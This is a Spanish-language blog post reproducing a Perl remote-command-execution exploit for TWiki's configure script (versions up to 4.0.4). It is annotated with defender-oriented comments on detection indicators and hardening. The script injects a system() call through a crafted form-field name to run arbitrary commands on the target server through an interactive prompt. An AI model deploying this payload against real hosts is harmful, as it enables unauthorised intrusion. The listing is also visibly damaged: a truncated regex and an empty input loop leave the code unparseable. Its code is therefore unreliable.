jueves, 28 de agosto de 2008

TWiki <= 4.0.4 (configure) - Remote Command Execution Exploit - Ejecución de código remoto

#!/usr/bin/perl
# Tue Aug 1 13:18:12 CEST 2006 jolascoaga@514.es
use strict;
use LWP::UserAgent;
use LWP::Simple;
use HTTP::Request;
use HTTP::Response;
use Getopt::Long;
# Driver section of a proof-of-concept aimed at the TWiki "configure" CGI
# script; the page title gives the affected range as TWiki <= 4.0.4.
# Defender's reading: the script parses its options, then loops forever,
# handing each prompt entry to send(), which issues one HTTP POST per entry.
# Hosts still on an affected release should be upgraded, and the configure
# script should not be reachable without web-server authentication or
# address restrictions.
#
# NOTE(review): the file enables `use strict` but not `use warnings`.

# Unbuffered STDOUT, so the prompt printed without a newline appears at once.
$| = 1; # couse 1 is bigger than 0
my ($proxy,$proxy_user,$proxy_pass);
my ($host,$debug,$dir, $command);
# The GetOptions result is stored in $options but never tested, so an
# unrecognised option does not stop the script.
my $options = GetOptions (
'host=s' => \$host,
'dir=s' => \$dir,
'proxy=s' => \$proxy,
'proxy_user=s' => \$proxy_user,
'proxy_pass=s' => \$proxy_pass,
'debug' => \$debug);
# --host is the only mandatory option; help() prints usage and exits 1.
&help unless ($host); # you dont need root
# Default request path when --dir is not given.
$dir = "/twiki/bin/configure" unless($dir); # ... we have a template for this
print "$host - $dir\n";
# An empty while condition is always true in Perl: this outer loop has no
# exit condition of its own.
while () {
print "tinkiwinki> "; # phf haquerz style
# NOTE(review): this listing looks damaged by the page's HTML rendering
# (angle-bracketed text appears to have been dropped). As shown, the inner
# loop reads nothing: it copies whatever $_ holds and leaves immediately.
while() {
$command=$_;
chomp($command);
last;
}
# The & sigil selects the user-defined send() below, not Perl's builtin send.
&send($command);
}

# send($cmd): build one HTTP POST for $host.$dir with $cmd spliced into the
# request body, submit it through LWP::UserAgent, and print part of the reply.
# Reads the file-level $host, $dir, $proxy, $proxy_user, $proxy_pass and
# $debug; rewrites $host in place when it lacks a scheme.
#
# What a defender can take from this block:
#   * The injected text travels in a form-field NAME, not a value: the body
#     carries a parameter whose name begins with "TYPEOF" followed by
#     URL-encoded punctuation (%3A%29%3B...) and a Perl system() call.
#     Well-formed configure submissions have no reason to contain such
#     parameter names, so POSTs to the configure path with a TYPEOF-prefixed
#     name holding encoded quotes, parentheses or semicolons are worth alerting on.
#   * The User-Agent is the fixed literal "safari/zoo". It is trivially
#     changeable, so treat it as a weak indicator only.
#   * The sub shares its name with Perl's builtin send; callers reach it
#     through the & sigil.
sub send {
my ($cmd) = @_;
# $ok and $socket are declared but never used in this sub.
my $ok = 0;
my $socket;
LWP::Debug::level('+') if $debug; # but remember this is crap :D
# Indirect-object constructor call; equivalent to LWP::UserAgent->new().
my $ua = new LWP::UserAgent();
$ua->agent("safari/zoo");
# Prefix a scheme when the host was given bare. Because $host is the
# file-level variable, the change persists across later calls.
if ($host !~ /^http/) {
$host = sprintf ("http://%s", $host); # CRAP CRAP CRAP
}
my $req = HTTP::Request->new(POST => $host.$dir);
# Fixed body with $cmd concatenated verbatim between the two literals.
# No Content-Type header is set on the request anywhere in this sub.
$req->content('action=update&TYPEOF%3A%29%3Bsystem%28%27'.$cmd.'%27%29%3Bmy+@a%3D%28=anything&submit=Submit');
# The proxy is registered for the http scheme only.
$ua->proxy(['http'] => $proxy) if $proxy;
$req->proxy_authorization_basic($proxy_user, $proxy_pass) if $proxy_user;
print $req->as_string() if $debug;
my $res = $ua->request($req);
# The response status is never checked; the body is used whatever the result.
my $html = $res->content();
# NOTE(review): the match below is truncated in this listing. The pattern
# has no closing delimiter, most likely because the page's HTML rendering
# removed the markup it contained, so the code as shown does not parse and
# it is not possible to tell from here which part of the reply was printed.
# In --debug mode the whole response body is then written to a file named
# "wikidebug" in the current directory, using a two-argument open on a
# bareword handle whose result is not checked and which is never closed
# explicitly. The file is truncated on every call.
$html =~ m/(.*?)

print $1."\n";
if ($debug) {
open (DEBG, ">wikidebug");
print DEBG $html;
}
}
# help(): write the usage summary to STDOUT and end the process with exit
# status 1. Never returns to the caller.
#
# NOTE(review): the syntax line shows --dir=/horde while the text states the
# default directory is /twiki/bin/configure; the example looks like a
# leftover from a different script. The strings are reproduced unchanged.
sub help {
    my @usage_lines = (
        "Syntax: ./$0 --host=url --dir=/horde [options]\n",
        "\t--proxy (http), --proxy_user, --proxy_pass\n",
        "\t--debug\n",
        "the default directory is /twiki/bin/configure\n",
        "\nExample\n",
        "bash# $0 --host=http(s)://www.server.com/\n",
        "\n",
    );

    # One print call emits the same bytes, in the same order, as printing
    # each line on its own.
    print @usage_lines;
    exit(1);
}
# Reached only if the prompt loop earlier in the file ever ends; as listed,
# that loop has no exit condition.
exit 0;
#

# milw0rm.com [2006-08-07]

